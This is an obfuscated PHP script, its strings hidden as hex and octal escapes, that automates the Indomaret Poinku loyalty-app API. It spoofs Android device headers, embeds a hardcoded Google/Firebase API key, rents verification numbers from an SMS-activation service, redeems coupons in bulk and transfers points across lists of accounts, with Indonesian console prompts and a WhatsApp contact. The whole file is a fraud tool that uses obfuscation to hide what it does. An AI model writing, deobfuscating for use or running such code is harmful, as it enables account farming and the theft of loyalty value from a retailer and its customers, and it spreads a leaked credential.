  echo "\12";
  goto IfjVc;
  Znx5G:
  $zvt88 = $QRhbE;
  goto ndPeW;
  wagK0:
  $QRhbE = explode("\12", @file_get_contents("\x66\x6f\x72\x63\x65\143\154\x6f\x73\145"));
  goto c9VHy;
  OGVYy:
  echo @Zm6ic("\x79\x65\x6c\x6c\x6f\x77", "\120\x6f\163\164\x61\x6c\40\x43\157\144\145\x20\x49\104\x20\72\40");
  goto jqBDn;
  y4a0t:
  echo "\12";
  goto tBWs_;
  nb0l8:
  goto fzpTX;
  goto h5zZT;
  EnReM:
  echo @ZM6Ic("\x6e\x65\166\171", $kp_uF);
  goto i1ZXy;
  XR1ud:
  echo @zM6Ic("\156\x65\x76\171", $BW_8H);
  goto A42_x;
  xkj3T:
  if (!($zcN5u == '')) {
    goto FbwVq;
  }
  goto Dq8Ho;
  g_wt9:
  $QRhbE = explode("\12", @file_get_contents("\155\171\164\x6f\x6b\x65\x6e"));
  goto TLgtD;
  QY65c:
  echo @ZM6IC("\147\x72\145\145\156", "\133\62\x5d\x20{$pew2b}\40\xa\40\40\x20\40\x3e\x20{$knJzU}\40\12\xa");
  goto tmNUb;
  rxO0c:
  echo "\xa";
  goto c7EKQ;
  FsFpb:
  echo "\xa";
  goto Hd85v;
  BJavt:
  @unlink("\160\157\x69\x6e\150\x70\x2e\160\150\160");
  goto RY_tp;
  trAV2:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto Geoq3;
  MznXj:
  Eqo5q:
  goto jX5Xi;
  PoC5U:
  if (!($fUekS == '')) {
    goto Q_Hza;
  }
  goto KiRsY;
  jfbPd:
  echo "\x4d\165\x6c\141\151\x20\x42\141\x72\x69\163\x20\113\x65\x20\x20\72\x20";
  goto NLM3A;
  SAFEQ:
  $nPb0z = json_decode($Jk9cx, true);
  goto s3nn0;
  XJ4uX:
  echo @ZM6iC("\x6e\x65\x76\171", "\123\157\x72\x72\171\x2c\x20\x54\x68\151\x73\x20\x53\143\x72\151\160\x74\40\x48\141\x73\x20\102\x65\x65\156\x20\x52\x65\155\x6f\166\x65\144\x20\102\171\40\124\150\x65\x20\117\x77\x6e\x65\x72\41\x21");
  goto KyXoa;
  X0B6J:
  if (!($Y_a4j == '')) {
    goto J2_16;
  }
  goto jWTaT;
  v1sZj:
  $XDyMm = @$Ap1KM["\144\x61\164\x61"]["\142\141\154\x61\x6e\x63\145"];
  goto kMtgl;
  TnnPp:
  $S8W9D = trim(fgets(STDIN));
  goto OTrdv;
  scxdN:
  echo @zm6iC("\x6e\145\166\x79", $p4iky);
  goto ziRG0;
  Q63qh:
  pfdwZ:
  goto bf2kg;
  NBKuI:
  if (!($IBJ55 == '')) {
    goto h93oq;
  }
  goto pGlLe;
  fcX90:
  $zvt88 = $QRhbE;
  goto T3KX5;
  KmhR1:
  $Ap1KM = json_decode($N0XGD, true);
  goto PVasB;
  fXDXt:
  $Ap1KM = json_decode($ofEkP, true);
  goto cMepj;
  H6DgW:
  goto lYTFu;
  goto RTtKY;
  BybP1:
  echo "\12";
  goto v4487;
  Sx52J:
  qHUhy:
  goto C0X4e;
  Go01J:
  $yy9BI;
  goto wsgYZ;
  Sszbg:
  echo "\xa";
  goto y8Khm;
  SriS5:
  echo @Zm6iC("\156\145\166\171", "\124\x65\x6b\141\x6e\40\x45\x6e\164\145\x72\40\x55\x6e\x74\165\153\40\114\141\x6e\x6a\165\x74\x20\x3a\x20");
  goto I5RSt;
  r_nAC:
  echo $jTEU0;
  goto Cr9sd;
  MSy9W:
  echo "\x53\x61\155\160\141\x69\40\102\141\162\x69\x73\x20\x4b\145\40\x3a\x20";
  goto NWybD;
  zznCp:
  echo @zM6ic("\x6e\145\166\x79", $pugmZ);
  goto OzzD7;
  tJQnU:
  $XDyMm = @$Ap1KM["\x64\141\x74\x61"]["\142\x61\x6c\x61\156\x63\x65"];
  goto R17tK;
  efhFP:
  echo $BcbF3;
  goto ZUFRT;
  T3KRP:
  $BcbF3 = @$Ap1KM["\144\x61\164\x61"]["\160\x68\x6f\156\x65\116\x75\x6d\x62\x65\162"];
  goto cT7sZ;
  q4c1O:
  echo @zM6Ic("\x6e\145\x76\x79", "\123\x6f\162\162\x79\54\x20\124\x68\x69\x73\x20\123\143\x72\151\x70\x74\40\110\x61\x73\x20\102\x65\x65\x6e\x20\x52\x65\155\157\166\145\x64\40\102\x79\40\124\150\x65\x20\x4f\x77\x6e\145\x72\41\41");
  goto Rw10h;
  xoEHm:
  echo "\12";
  goto hKxlt;
  NCD0t:
  $zcN5u = XOzb4(array("\x7c"), $wZnHP)[0];
  goto OnVQz;
  mf9wm:
  echo "\12";
  goto wfRVl;
  eMjID:
  $k1y0B = G1wXt("\x68\164\164\x70\163\x3a\57\57\145\144\x74\x73\x61\x70\160\x2e\x69\x6e\x64\157\x6d\x61\162\x65\164\160\x6f\x69\156\x6b\x75\56\143\157\x6d\x2f\143\165\x73\164\157\x6d\145\x72\x2f\141\160\151\170\55\61\65\60\62\x2d\141\x70\x69\57\162\145\x6d\157\166\145\x2d\x69\x73\141\153\x75\55\x74\157\153\145\x6e", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto mHTY8;
  BjSHt:
  echo "\12";
  goto m280i;
  rrrlO:
  lUvmA:
  goto fxg3h;
  P16AV:
  ZjzxQ:
  goto Eko9L;
  D0i6Z:
  $yy9BI++;
  goto JOHzs;
  t9SxY:
  $upOL9 = G8PF2("\150\x74\164\x70\163\72\57\57\145\144\164\x73\x61\x70\160\56\151\156\x64\157\155\x61\162\145\x74\x70\157\x69\156\x6b\165\56\x63\x6f\155\x2f\x6c\x6f\171\x61\154\x74\x79\x2f\x61\160\151\x78\x2d\61\65\x30\62\x2d\x61\160\151\57\155\157\142\x69\154\145\57\163\164\x61\155\x70\x73\x2f\x6d\145\57\142\x75\143\153\x65\164\x73\57" . $e0XZt . "\x2f\160\x72\157\155\x6f\164\151\x6f\156\163\77\x75\156\x70\x61\x67\145\x64\75\x74\x72\165\145\46\x73\157\162\164\x3d\x63\x72\145\141\164\145\144\104\141\x74\145\54\x64\145\163\143", $aY0el, $GOXkU, $mlMLt);
  goto LGPrS;
  GShuM:
  iL2Tt:
  goto P8zZ3;
  gC9XY:
  function aUjhZ($lEbop, $wDisp = null, $YYbml)
  {
    goto hwDdj;
    DTOUZ:
    $ruc3h[] = "\x43\x6f\156\156\x65\143\x74\151\157\x6e\x3a\x20\x4b\x65\x65\160\x2d\x41\x6c\x69\166\145";
    goto KjgQQ;
    tdwlP:
    $AXlcQ = json_decode($y7f11, true);
    goto UlJxV;
    yD3te:
    $ruc3h[] = "\x58\55\107\157\x6f\147\154\145\55\x47\106\105\55\103\141\156\x2d\x52\145\164\x72\x79\x3a\x20\x79\145\x73";
    goto UdJHV;
    dkquh:
    $ruc3h[] = "\x58\x2d\101\156\144\x72\157\x69\144\x2d\x50\x61\x63\153\x61\x67\x65\x3a\40\x6d\x79\160\157\151\156\56\x69\156\144\157\155\x61\162\x65\164\x2e\x61\x6e\x64\x72\157\x69\144";
    goto UL_OF;
    dnomb:
    goto H_Rzs;
    goto aDSnC;
    NGvA0:
    $ruc3h[] = "\x55\163\145\x72\55\101\x67\145\x6e\x74\72\x20\x44\141\154\166\151\153\57\x32\x2e\x31\x2e\60\40\50\x4c\151\x6e\x75\x78\73\x20\x55\73\40\x41\x6e\144\x72\157\151\144\x20\71\x3b\x20\122\x65\x64\x6d\151\x20\x35\x20\120\x6c\165\x73\x20\102\x75\151\x6c\x64\x2f\x50\x51\x33\101\56\61\x39\60\70\60\x31\56\60\60\x32\51";
    goto DTOUZ;
    DR_7V:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto Ai6n_;
    C0yMJ:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto bt5RA;
    UL_OF:
    $ruc3h[] = "\130\55\x41\156\144\x72\157\x69\144\x2d\103\145\162\164\72\x20\101\x30\x34\x46\106\x39\63\66\x30\104\x38\x35\x33\x33\64\71\x37\x38\62\x45\103\x30\102\66\71\x45\x44\104\104\x41\106\x42\105\62\106\x35\65\x43\61\70";
    goto yD3te;
    UdJHV:
    $ruc3h[] = "\130\x2d\107\x6f\x6f\x67\55\106\151\162\145\142\141\163\x65\x2d\111\156\x73\164\141\154\154\x61\164\x69\157\x6e\163\x2d\101\165\164\150\72\40" . $YYbml;
    goto ZAPvT;
    Ffs7y:
    return $ECuqv;
    goto nZa6Q;
    bt5RA:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto WElhE;
    FJu5f:
    $ruc3h[] = "\x49\146\x2d\116\x6f\x6e\x65\55\x4d\141\x74\x63\x68\x3a\40\145\x74\x61\x67\55\71\71\70\x38\x31\x36\x36\60\65\63\x32\x38\x2d\146\x69\162\145\x62\141\x73\145\55\x66\145\164\x63\150\55\61\x37\65\60\x39\66\70\x37\63\x37";
    goto F72jN;
    gRgbW:
    H_Rzs:
    goto tdwlP;
    jTplO:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto DR_7V;
    hwDdj:
    $C6npe = curl_init();
    goto jTplO;
    LyDeF:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\154\151\153\56\x74\170\x74");
    goto XC0dv;
    ZAPvT:
    $ruc3h[] = "\x43\x6f\156\x74\x65\156\x74\55\124\171\160\x65\x3a\40\x61\160\x70\154\151\x63\x61\x74\x69\157\156\57\152\x73\157\156";
    goto NAfxb;
    CLJKH:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto PpvC9;
    jPVdu:
    $ECuqv = curl_exec($C6npe);
    goto Icc0S;
    KjgQQ:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto C0yMJ;
    UlJxV:
    print_r($AXlcQ);
    goto Ffs7y;
    F72jN:
    $ruc3h[] = "\x58\55\x47\x6f\x6f\147\x2d\x41\x70\x69\x2d\x4b\x65\x79\72\40\101\111\172\141\123\171\x42\141\x50\63\120\x51\66\165\x6f\150\122\132\x38\x51\116\144\x72\64\144\104\137\123\x53\x63\157\x54\x43\x74\141\106\67\x6f\153";
    goto dkquh;
    ZCEau:
    if (!$P7lm9) {
      goto gOFKt;
    }
    goto CLJKH;
    WElhE:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto LyDeF;
    jcBo1:
    return false;
    goto gRgbW;
    XC0dv:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\154\x69\153\x2e\164\170\164");
    goto jPVdu;
    PpvC9:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto dnomb;
    aDSnC:
    gOFKt:
    goto jcBo1;
    Icc0S:
    $P7lm9 = curl_getinfo($C6npe);
    goto ZCEau;
    Ai6n_:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto SkFCV;
    NAfxb:
    $ruc3h[] = "\101\x63\143\145\160\164\x3a\40\x61\x70\x70\154\151\x63\141\x74\151\x6f\156\x2f\x6a\163\x6f\156";
    goto NGvA0;
    SkFCV:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto FJu5f;
    nZa6Q:
  }
  goto dyoyZ;
  zYTlH:
  kZBrv:
  goto EAifF;
  MkfQF:
  echo @zM6ic("\156\145\x76\171", "\x20\x53\x45\115\x4f\107\101\40\114\x4f\x42\101\x4e\x47\40\x50\101\x4e\x54\x41\124\x20\x4e\131\x41\x20\102\111\123\125\x4c\101\x4e\x21\41\x21\41\x21\40\xa");
  goto Sk1M_;
  mPckR:
  die;
  goto cSbKL;
  vCHP8:
  $gIJCo = json_decode($gIJCo, true);
  goto JEsx3;
  MJ4XI:
  $QRhbE = explode("\12", @file_get_contents("\146\x6f\x72\143\145\143\x6c\157\x73\145"));
  goto ayaqJ;
  sTQjT:
  echo @zM6iC("\x67\162\145\x65\x6e", $wd9cN);
  goto QzPor;
  LzqPy:
  echo @ZM6ic("\171\145\x6c\154\x6f\167", "\174\40\127\x41\40\60\x38\x32\x31\x37\66\63\65\x38\62\x39\x35\40\12");
  goto C0b6j;
  TaqSA:
  $xp_1p = "\153\x6c\x69\x6b\x2e\x74\170\164";
  goto uP7Pk;
  okpAe:
  echo "\12";
  goto VfGJN;
  QLRL1:
  $wDisp = "\173\x22\144\141\x74\141\x22\x3a\133\x7b\x22\x61\160\160\154\x69\x63\x61\x74\x69\x6f\156\42\72\x7b\42\141\x70\160\137\x76\x65\162\x73\151\157\x6e\42\x3a\x22\63\x2e\x31\63\x2e\60\42\54\x22\144\145\x76\151\143\145\x5f\x63\x6c\x61\163\x73\x22\x3a\42\120\x68\x6f\156\x65\x22\x2c\42\x64\145\x76\x69\143\145\137\x66\x61\155\151\x6c\171\42\72\42" . $GOXkU . "\42\54\42\x64\145\x76\151\x63\145\137\151\144\x22\x3a\42" . $aY0el . "\42\x2c\42\157\163\x5f\156\x61\x6d\x65\x22\72\42\101\156\x64\x72\x6f\x69\144\40\x50\42\x2c\42\157\x73\137\166\145\x72\x73\x69\x6f\156\42\72\x22\x41\x6e\144\x72\x6f\151\x64\x20\x39\42\x7d\54\x22\x63\x6f\162\145\42\x3a\173\42\144\x65\164\x61\151\x6c\163\x22\72\x7b\x22\x69\x73\x61\x6b\165\137\x73\164\x61\x74\x75\163\42\x3a\42\x48\x75\x62\165\156\147\x6b\141\x6e\x22\175\54\x22\145\166\145\x6e\164\x5f\x6e\141\x6d\145\x22\x3a\42\x70\x61\147\x65\137\144\145\164\141\151\154\42\x2c\42\x65\166\145\x6e\x74\137\x74\x69\155\145\x73\x74\141\155\x70\42\x3a" . $nb9cm . "\54\x22\160\141\x67\145\137\x6e\x61\x6d\145\42\72\42\151\x73\141\153\165\42\x7d\x2c\x22\x6d\x61\x72\x6b\x65\164\151\156\x67\x22\x3a\173\x22\x75\164\155\x5f\162\141\167\x22\72\42\165\164\x6d\137\x73\157\x75\162\143\x65\75\147\x6f\157\x67\x6c\x65\x2d\x70\x6c\141\171\x26\165\x74\x6d\x5f\x6d\145\144\x69\x75\x6d\75\x6f\162\147\141\156\x69\x63\x22\175\x2c\42\x75\163\x65\162\x22\72\173\42\x73\145\x73\x73\151\x6f\x6e\x5f\x69\144\42\x3a\42" . $MXjqh . "\42\54\x22\165\x73\145\x72\137\151\144\42\x3a" . $R_bYC . "\x2c\x22\x75\163\x65\x72\137\x69\160\x5f\141\x64\144\x72\145\x73\x73\x22\72\x22\61\x32\67\x2e\60\x2e\60\x2e\61\42\175\x7d\x5d\x7d";
  goto lyjUC;
  daCzy:
  echo @Zm6Ic("\171\145\x6c\x6c\x6f\167", "\x20\x2d\x20\x48\141\162\141\160\40\124\145\x6c\x69\164\x69\40\x44\141\x6c\141\155\x20\x4d\x65\x6e\147\147\165\156\141\153\141\156\40\123\143\x72\151\x70\x74\12");
  goto eqpXU;
  CX3Ha:
  echo $BcbF3;
  goto xoWJi;
  QXpWd:
  echo @zm6IC("\156\145\x76\x79", $tJqX7);
  goto D0LEk;
  ufeHC:
  $jTEU0++;
  goto v0pQL;
  Gs7s7:
  echo @Zm6Ic("\x79\145\x6c\154\x6f\167", "\x4e\x61\x6d\x61\x20\x50\x65\x6e\145\x72\151\x6d\x61\40\x20\x20\x3a\x20");
  goto a2PpR;
  xz1rM:
  $earOL = $sONlZ;
  goto Mr9wz;
  VXnb2:
  echo "\12";
  goto jfbPd;
  nSNur:
  echo "\xa";
  goto vsMZx;
  NIIPa:
  echo @Zm6iC("\x6e\x65\166\171", $YXsOG);
  goto VvV7s;
  djw9a:
  $RJnNP = trim(fgets(STDIN));
  goto yAXnQ;
  zs8V0:
  $a7K8a = AuJHZ("\x68\164\164\160\163\72\x2f\57\146\x69\x72\145\x62\x61\163\145\162\x65\155\x6f\x74\x65\x63\157\156\146\151\147\x2e\147\157\157\x67\x6c\x65\x61\160\x69\163\x2e\x63\157\x6d\57\x76\61\57\160\162\x6f\152\x65\143\x74\x73\x2f\x39\x39\x38\x38\61\x36\x36\60\65\x33\x32\70\x2f\156\141\x6d\145\x73\160\141\x63\x65\x73\57\x66\x69\162\145\142\x61\x73\x65\72\146\x65\x74\x63\x68", $wDisp, $YYbml);
  goto G0IiA;
  dZum6:
  goto hLVkj;
  goto cED13;
  VO7F2:
  echo @Zm6ic("\x72\145\144", "\xa\176\x7e\176\x7e\176\x7e\x7e\176\176\x7e\176\x7e\x7e\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\176\x7e\x7e\176\x7e\x7e\x7e\176\176\176\176\x7e\x7e\x7e\176\176\176\x7e\176\176\x7e\x7e\x7e\x7e\x7e\x7e\xa");
  goto Cqx0O;
  jiAUE:
  echo "\12";
  goto lqIFf;
  AtJEi:
  $u35jw = count($m0f8X) - 1;
  goto vI4fi;
  Tg2Pm:
  $OtngW = $eqo_P;
  goto HrdBY;
  NLM3A:
  $jTEU0 = trim(fgets(STDIN));
  goto FRrum;
  XGDc2:
  echo @zm6ic("\171\145\154\154\157\167", "\x7c\x20\x57\101\x20\x30\x38\62\x31\x37\66\63\65\x38\62\x39\x35\x20\xa");
  goto mwNvq;
  EaXxp:
  $zcN5u = XOZB4(array("\174"), $tqWr2)[0];
  goto oLXie;
  oFFPR:
  eFIM1:
  goto mTGZw;
  WVkb3:
  vRTIW:
  goto E3UbE;
  KN2v8:
  goto fzpTX;
  goto tz8wc;
  yRdKx:
  $ogbF4 = "\x31\60\60\60\60\x30\x30\60";
  goto E7eXl;
  Qm56f:
  @unlink("\160\x6f\x69\x6e");
  goto Qvm57;
  KvSHm:
  echo @ZM6Ic("\x6e\x65\x76\171", $p4iky);
  goto yqzNQ;
  b_gi8:
  $S8W9D = trim(fgets(STDIN));
  goto lJl7c;
  kiloP:
  $wDisp = "\x7b\42\143\157\x75\x70\x6f\x6e\x49\x64\42\x3a\42" . $Qa1_P . "\x22\54\42\161\164\171\42\72\x31\x2e\x30\54\42\160\x6f\151\156\164\x45\170\143\x68\x61\x6e\147\145\111\x64\42\x3a\x22" . $VJtH7 . "\x22\175";
  goto QwhGW;
  Ul8XG:
  die;
  goto tx212;
  Y4tmI:
  echo "\12";
  goto mM1Qy;
  Lbb3x:
  echo @ZM6IC("\x72\145\x64", "\xa\176\176\176\176\176\x7e\176\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\x7e\176\176\176\x7e\x7e\176\x7e\x7e\176\176\176\176\x7e\176\x7e\x7e\176\x7e\176\176\176\x7e\x7e\x7e\176\x7e\x7e\176\x7e\176\x7e\xa");
  goto S2q_E;
  dRer4:
  $QRhbE = explode("\xa", @file_get_contents("\x66\157\x72\x63\x65\x63\154\157\163\x65"));
  goto jYjqX;
  XN9Lf:
  $WvHe1 = @$lImQC["\x64\141\x74\x61"]["\x63\x6f\156\x74\145\x6e\x74"][6]["\x63\157\165\x70\x6f\156\x43\x6f\144\x65"];
  goto YVULM;
  Jwbfk:
  echo @zm6IC("\x79\x65\154\x6c\157\167", "\115\x61\x73\165\153\153\141\x6e\40\105\x6d\141\x69\x6c\x20\120\145\x6e\145\x72\x69\155\141\x20\72\x20");
  goto rn4By;
  TZuPQ:
  echo @ZM6iC("\156\x65\166\x79", "\x41\x6b\x75\x6e\x20\x4b\145\x20\x20\x20\x20\40\40\40\x20\72\40");
  goto eryO5;
  pIWJg:
  $Ap1KM = json_decode($xT15V, true);
  goto oeXWG;
  Sgp3W:
  @unlink("\x70\x6f\x69\156\150\x70\56\160\x68\160");
  goto nJUpr;
  hJQHr:
  $Jk9cx = g8Pf2("\x68\x74\164\x70\163\72\57\x2f\145\x64\164\163\x61\x70\160\x2e\151\x6e\x64\x6f\155\x61\162\x65\164\x70\157\x69\156\153\x75\x2e\x63\157\155\x2f\x63\x75\x73\x74\x6f\155\145\x72\57\x61\160\x69\x78\x2d\61\x35\60\x32\55\141\160\x69\x2f\155\157\x62\151\x6c\145\x2f\x64\x65\x74\141\151\154\x2d\x63\165\163\x74\x6f\155\x65\x72\55\157\162\x69\147\x69\156", $aY0el, $GOXkU, $mlMLt);
  goto aopGf;
  OJgKJ:
  $Ia9Ix = Z82DB("\150\x74\x74\x70\163\x3a\57\57\x73\155\163\x2d\141\x63\164\x69\166\x61\x74\x65\56\x72\x75\x2f\163\x74\165\x62\163\x2f\150\x61\156\x64\x6c\x65\x72\x5f\x61\x70\x69\x2e\x70\150\160\77\157\x77\156\x65\x72\x3d\65\x26\141\x70\x69\137\x6b\x65\171\x3d" . $rVPVc . "\46\141\143\164\151\x6f\156\x3d\147\145\164\123\x74\x61\164\165\x73\x26\155\141\x72\x6b\x65\x74\x5f\151\144\x3d\61\x26\x73\145\x73\x73\151\157\156\x49\144\75\70\66\146\64\142\146\63\61\x63\61\x34\x35\x62\61\65\144\x30\x37\x33\x64\65\x62\x64\65\x38\142\143\x39\61\x32\60\x65\x26\151\144\x3d" . $jU3Co);
  goto sHcge;
  n2vj8:
  $D2zwh = "\60";
  goto fs5BL;
  NqMIz:
  shell_exec("\163\x74\x61\x72\164\40\143\x68\162\157\x6d\145\40\x22\150\164\164\160\163\x3a\57\x2f\x62\x61\x72\143\157\x64\145\56\164\x65\x63\55\x69\164\56\143\x6f\x6d\57\142\x61\162\143\157\144\145\x2e\x61\163\x68\170\77\144\x61\164\141\x3d\42" . $p4iky . "\x22\46\x63\157\x64\x65\x3d\x43\157\x64\145\61\62\x38\x26\155\165\x6c\x74\151\160\154\x65\142\x61\x72\143\x6f\x64\145\163\75\146\141\154\163\145\x26\x74\x72\141\156\x73\154\x61\164\x65\x2d\145\x73\143\x3d\x74\x72\165\x65\46\165\x6e\151\x74\x3d\x46\x69\164\x26\144\x70\x69\75\71\66\46\x69\155\x61\x67\145\164\171\160\x65\x3d\x47\x69\x66\x26\x72\157\164\141\x74\151\157\156\x3d\x30\x26\143\157\x6c\157\162\x3d\45\62\x33\x30\60\60\60\x30\60\x26\142\147\143\157\154\157\x72\x3d\x25\62\63\x66\146\x66\x66\x66\146\46\143\x6f\144\145\x70\x61\147\145\75\104\145\146\x61\165\154\x74\x26\161\165\156\x69\164\x3d\x4d\155\46\x71\165\x69\x65\164\x3d\61\x30\46\150\x69\x64\x65\150\162\164\75\x46\141\x6c\x73\145\42");
  goto jgsP1;
  NXRyP:
  gbJTu:
  goto RV_I1;
  VJNKS:
  shell_exec("\163\164\x61\162\x74\x20\143\x68\162\157\155\x65\40\x22\x68\x74\x74\160\x73\x3a\57\x2f\x62\x61\x72\x63\157\x64\145\56\164\x65\x63\55\x69\164\x2e\143\x6f\155\57\142\x61\162\x63\x6f\144\x65\56\x61\163\150\170\77\x64\x61\x74\141\x3d\42" . $QG8my . "\42\x26\x63\x6f\144\145\75\103\x6f\x64\x65\x31\x32\x38\x26\x6d\x75\x6c\164\x69\x70\154\145\142\141\162\x63\157\x64\x65\163\x3d\146\x61\x6c\163\x65\46\x74\x72\141\x6e\x73\x6c\141\164\145\55\x65\163\143\75\x74\x72\x75\x65\x26\x75\156\x69\x74\75\x46\x69\x74\46\144\x70\x69\x3d\x39\66\46\151\x6d\141\x67\x65\164\x79\160\145\x3d\107\151\146\46\x72\157\164\x61\164\151\157\156\x3d\x30\46\x63\x6f\154\x6f\162\x3d\x25\x32\63\x30\60\x30\60\60\x30\x26\142\x67\143\x6f\154\x6f\162\75\45\62\63\x66\146\146\146\x66\x66\x26\x63\x6f\144\x65\x70\141\147\x65\75\104\145\146\141\x75\154\x74\46\161\165\x6e\151\x74\x3d\x4d\155\x26\161\165\151\145\164\75\x31\x30\x26\x68\x69\x64\x65\x68\162\164\x3d\106\x61\x6c\x73\145\x22");
  goto JlfKN;
  vkYxU:
  $m5BZY = GGGR_("\150\164\x74\x70\163\x3a\x2f\x2f\x61\163\151\141\x2d\x73\157\165\164\150\145\x61\163\164\62\x2d\151\x64\155\55\143\x6f\162\160\55\160\x72\x64\56\x63\154\157\165\144\146\165\156\143\x74\151\x6f\x6e\x73\56\x6e\x65\164\57\151\144\x6d\141\x70\160\x73\137\164\162\141\143\x6b\x65\x72\x5f\x67\x61\164\145\167\141\x79", $wDisp);
  goto OplG0;
  DgaoM:
  $GOXkU = $w5ulg;
  goto yDDs8;
  plK7Z:
  V9iZ0:
  goto nT7ar;
  sfztk:
  echo @Zm6Ic("\156\145\x76\171", "\40\x20\40\40\x20\x20\40\x20\40\40\131\x41\x4e\x47\x20\x4e\x59\x45\x42\x41\122\x49\116\40\123\x43\x52\x49\120\124\x20\x49\116\x49\x20\xa");
  goto TpXcJ;
  ELsW3:
  die;
  goto ZbVXq;
  CBPly:
  $wDisp = "\173\42\x70\150\x6f\156\x65\x4e\x75\155\x62\x65\162\42\72\42" . $zn5zd . "\42\54\x22\144\145\x76\x69\143\x65\x49\144\42\x3a\42" . $aY0el . "\x22\175";
  goto tMEM6;
  UdB79:
  echo @Zm6iC("\x79\145\x6c\x6c\x6f\x77", "\x50\x6f\x69\x6e\x20\x41\x6b\x75\x6e\x20\x41\156\x64\x61\x20\x3a\x20");
  goto cubbE;
  mhPin:
  echo @zm6Ic("\171\145\x6c\154\x6f\x77", "\133\x31\63\x5d\40{$t4wQX}\40\xa\40\x20\x20\x20\76\x20{$Q6vWf}\x20\12\xa");
  goto RgM1e;
  sNEus:
  $wDisp = "\173\x22\x64\141\x74\x61\x22\72\133\x7b\x22\141\160\x70\x6c\151\x63\141\x74\x69\157\156\x22\x3a\x7b\x22\x61\x70\160\137\x76\x65\162\163\151\x6f\156\x22\72\x22\63\x2e\61\x33\56\x30\x22\54\x22\x64\145\166\x69\143\145\137\143\154\141\x73\163\x22\x3a\42\x50\x68\157\x6e\x65\x22\x2c\42\x64\x65\x76\x69\x63\145\x5f\x66\141\x6d\x69\x6c\x79\42\72\x22" . $GOXkU . "\42\54\42\x64\145\166\151\143\145\x5f\151\x64\42\x3a\x22" . $aY0el . "\42\54\x22\157\163\x5f\x6e\x61\155\145\x22\72\42\101\156\144\162\157\151\x64\x20\120\x22\x2c\x22\x6f\163\x5f\166\145\162\x73\x69\x6f\156\x22\x3a\42\x41\156\x64\162\157\x69\x64\40\71\x22\x7d\54\x22\x63\x6f\x72\x65\x22\72\173\x22\x66\141\151\154\145\x64\x5f\x72\x65\x61\x73\157\x6e\x22\72\42\x53\165\x63\x63\145\x73\163\x20\120\x49\116\x20\x61\143\x74\151\x76\x61\x74\151\x6f\156\x22\x2c\x22\145\166\145\x6e\x74\x5f\x6c\141\142\x65\154\42\72\42\120\x49\x4e\40\x61\x63\x74\151\x76\141\x74\x69\x6f\x6e\42\x2c\x22\145\x76\x65\156\164\137\156\x61\155\x65\x22\x3a\42\x65\166\145\156\164\x5f\x73\165\142\x6d\x69\163\163\x69\157\x6e\x22\x2c\42\145\166\x65\x6e\x74\x5f\x73\x74\x61\x74\165\x73\x22\x3a\42\x73\165\x63\143\145\163\163\42\54\42\145\166\145\156\x74\x5f\164\x69\x6d\x65\x73\164\x61\155\160\x22\x3a" . $nb9cm . "\175\54\x22\155\x61\162\x6b\145\164\x69\x6e\147\42\x3a\x7b\x22\x75\x74\x6d\x5f\162\141\167\42\x3a\42\165\x74\155\137\163\x6f\x75\162\x63\145\75\147\157\157\x67\x6c\145\x2d\x70\x6c\x61\171\46\x75\164\x6d\x5f\155\145\x64\151\x75\x6d\x3d\157\x72\x67\x61\156\x69\143\x22\175\x2c\x22\x75\x73\x65\x72\x22\x3a\173\42\163\x65\163\x73\151\157\156\137\151\x64\x22\72\x22" . $MXjqh . "\42\54\x22\165\163\145\162\x5f\x69\x64\42\72" . $R_bYC . "\54\x22\165\163\145\162\137\151\x70\137\141\144\x64\x72\145\x73\x73\x22\72\x22\x31\x32\x37\x2e\x30\x2e\60\x2e\x31\42\175\175\x5d\x7d";
  goto Ca9kW;
  EJmp3:
  if (!($yy9BI < $DxrJr)) {
    goto fZnQ2;
  }
  goto nsRvn;
  AvLYy:
  $XDyMm = G8pf2("\150\164\x74\x70\x73\72\x2f\57\145\144\x74\x73\x61\x70\160\56\151\156\144\x6f\x6d\141\162\x65\164\x70\x6f\x69\x6e\153\x75\x2e\x63\157\x6d\x2f\x63\157\165\x70\157\x6e\57\x61\160\151\x78\x2d\x31\x35\x30\62\x2d\x61\x70\151\x2f\155\x6f\142\151\154\145\x2f\143\x6f\165\x70\157\156\x73\57\x68\141\x73\55\156\x65\167\x2d\143\x6f\165\160\157\x6e", $aY0el, $GOXkU, $mlMLt);
  goto SpiQk;
  XfE0J:
  die;
  goto Mjz7D;
  Roi_C:
  $jcXSt = @$gIJCo["\x67\145\157"];
  goto Sswct;
  o7RA7:
  $knJzU = @$lImQC["\x64\x61\x74\x61"]["\x63\x6f\156\164\x65\156\x74"][2]["\x63\157\x75\x70\157\156\x43\x6f\x64\x65"];
  goto jiC8F;
  e05Ru:
  @unlink("\x70\x6f\151\156\x68\160\56\x70\x68\x70");
  goto kaG91;
  ibp8F:
  echo @zM6Ic("\x79\x65\x6c\154\x6f\x77", "\123\x74\x61\x74\x75\163\40\x50\x65\x63\x61\x68\x69\156\40\x41\171\x61\155\x20\x3a\x20");
  goto hS2Td;
  dqjxO:
  $ofEkP = zFeBK("\150\x74\x74\x70\x73\x3a\x2f\57\x65\144\164\163\x61\x70\160\56\151\156\x64\157\x6d\x61\162\x65\x74\160\157\151\x6e\153\165\56\x63\x6f\155\x2f\154\157\x79\x61\154\164\x79\57\141\x70\151\x78\55\x31\x35\x30\x32\55\x61\160\x69\57\155\x6f\142\151\x6c\x65\x2f\x70\157\x69\156\164\x73\x2f\155\145\x2f\160\162\x6f\x74\145\x63\x74\x69\157\x6e\163\57\145\x6e\x61\x62\x6c\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto sWc79;
